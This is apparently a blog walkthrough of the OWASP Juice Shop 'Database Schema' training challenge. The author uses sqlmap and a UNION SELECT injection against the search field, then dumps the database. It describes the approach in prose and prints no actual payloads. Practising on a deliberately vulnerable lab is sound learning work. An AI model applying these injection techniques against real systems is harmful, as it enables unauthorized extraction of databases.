Name: Database Schema
Description: Exfiltrate the entire DB schema definition via SQL injection.
Difficulty: 3 star
Expanded Description: https://pwning.owasp-juice.shop/part2/injection.html
Burp, FoxyProxy, sqlmap
SQL Injection Payload Wordlist
OWASP SQL Injection Documentation
OWASP SQL Injection Bypassing WAF
SQL injection is still a topic I need to gain a better grasp on. While I’ve taken courses where I’ve planned, diagrammed, and built databases, studied relational algebra, and written SQL queries, I’m more than a little rusty at it. That fact, coupled with a desire to become more comfortable with the tools available to me in Kali Linux, led to using sqlmap for my first attempt at solving this problem. From previous challenges (DOM XSS) I knew that there was no input sanitization on the “Search” field, so I decided to start there.
As sqlmap has differing levels of intensity (how noisy and potentially harmful it is to the target system), and because I’m running the application on Docker, I decided there was no real point in being quiet. As such I set up the program to be exceedingly thorough in its search of that input field.
What do you know? It’s vulnerable! OK, so now to extract the database schema and finish off this challenge.
But there was no completion alert. It wasn’t difficult to figure out that OWASP hadn’t set up this challenge simply to test my sqlmap skills, so I began reading up on how to craft a UNION SELECT attack through the address bar. Thanks to the sqlmap results, I knew there were 21 different tables to enumerate, but beyond that I was a little lost.
OK, a lot lost. After deciphering error after error, I narrowed down the number of tables I actually needed to enumerate to nine rather than 21. Knowing I was close, however, didn’t make this easier. Ultimately I gave in and read the solution. Had I replaced ‘1’ with ‘sql’ in my final query, it would have worked. Horseshoes and hand grenades, I suppose.
Because I had already used sqlmap and knew worked, once I had completed this challenge I went back and dumped the entire database to a text file, formatted that file for easy reading, and stored it for later use. The more I know about the system in general, and database contents specifically, the more easily I’ll be able to solve future challenges.
Prevention and mitigation strategies:
Sanitize input fields!
Lessons Learned and Things Worth Mentioning:
- When I started writing these walkthroughs I pointed out that I would be using this series to learn, not to demonstrate mastery. It’s not my favorite thing in the world to admit defeat, but sometimes the best way to learn something is to see it done properly and try to understand why it works the way it does. Beating your head against the wall is only so effective.